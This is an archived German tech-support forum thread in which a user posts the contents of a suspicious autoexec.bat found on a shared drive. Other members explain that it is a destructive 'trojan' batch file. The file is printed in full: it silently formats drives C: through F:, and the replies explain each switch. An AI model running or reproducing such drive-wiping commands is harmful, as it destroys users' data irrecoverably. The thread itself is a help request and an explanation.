1. Liebe Forumsgemeinde,

aufgrund der Bestimmungen, die sich aus der DSGVO ergeben, müssten umfangreiche Anpassungen am Forum vorgenommen werden, die sich für uns nicht wirtschaftlich abbilden lassen. Daher haben wir uns entschlossen, das Forum in seiner aktuellen Form zu archivieren und online bereit zu stellen, jedoch keine Neuanmeldungen oder neuen Kommentare mehr zuzulassen. So ist sichergestellt, dass das gesammelte Wissen nicht verloren geht, und wir die Seite dennoch DSGVO-konform zur Verfügung stellen können.
    Dies wird in den nächsten Tagen umgesetzt.

Ich danke allen, die sich in den letzten Jahren für Hilfesuchende und auch für das Forum selbst engagiert haben. Ich bin weiterhin für euch erreichbar unter tti(bei)pcwelt.de.
    Dismiss Notice

Autoexec.bat = trojaner ??

Discussion in 'Windows XP / Server 2003/2008 / Vista' started by supermarv, Apr 9, 2008.

Thread Status:
Not open for further replies.
  1. supermarv

supermarv Byte

Hallo, ich hab weil ich anstatt am PC am Notebook arbeiten will, einfach c:\ freigegeben.Als ich reingeschaut habe war autoexec.bat nicht unsichtbar,
    deswegen hab ich einfach mal reingeschaut:D Aufeinmal stand da:

Code:
    @ECHO OFF
    REM TROJAN 0.0.0 by r3v0lt InTRuDeD
    REM Contact : r3v0lt@linuxmail.org!
    FORMAT F: /AUTOTEST /U /C /Q > NUL
    FORMAT E: /AUTOTEST /U /C /Q > NUL
    FORMAT D: /AUTOTEST /U /C /Q > NUL
    FORMAT C: /AUTOTEST /U /C /Q > NUL

irgendwie sieht das nicht so gut aus oder ??
    Könnt ihr das ma checken ???
    Danke schonmal
    -supermarv

Attached Files:

2. Sele

Sele Freund des Forums

Nod32: ohne Befund

3. normalbürger

normalbürger Viertel Gigabyte

Irgendwann mal mit Linux / Apache auf dem Teil rumprobiert?

4. supermarv

supermarv Byte

ja ich hab ma mit ner linux live-cd rumprobiert, dann aber inne tonne geschmissen da ich garkeine berechtigungen hatte zum speichern, echt dumm

5. supermarv

supermarv Byte

aber was heisst der befehl "FORMAT" ?? löschen????

6. normalbürger

normalbürger Viertel Gigabyte

Jep, FORMAT = Formatieren = alles wech
    Aber keine Angst, moderne BS Kennen die Parameter nicht mehr und maulen rum und führen das nicht aus.
    War da früher mal W98 oder kleiner drauf?

7. supermarv

supermarv Byte

Ne war kein 98 druf immer xp
    aber kann man das aus sicherheit löschen??

8. deoroller

deoroller Wandelndes Forum

Mit Format formatiert man ein Laufwerk.
    Manche Schalter funktionieren nur unter MS-DOS. Die die funktionieren werden in der Format-Hilfe beschrieben. Siehe Start-Ausführen cmd starten und dann format /?.

/autotest bedeutet keine Abfrage
    /U = Festplatte wird ganz gelöscht. Man sagt auch unwiederbringlich.
    /C = Auf dem neuen Datenträger erstellte Dateien werden standardmäßig komprimiert.
    /Q = QuickFormat
    löscht nur die FAT (File Allocation Table), die alle Infos über den Inhalt der Platte beinhaltet. Ist die FAT gelöscht, so ist die Platte für Windows leer. Die Daten sind aber nicht weg, solange sie nicht überschrieben werden. Das macht dann der Schalter /U.
    > NUL = Ausgaben, Meldungen werden ins NUL-Device (Ausguss/Nirvana/schwarzes Loch) umgeleitet. Das ist dann unwiederbringlich weg.

Das kann ein Trojaner sein.

Du kannst den Inhalt der autoexec.bat vollständig löschen. Die Datei selbst würde ich nicht löschen.

Thread Status:
Not open for further replies.

Share This Page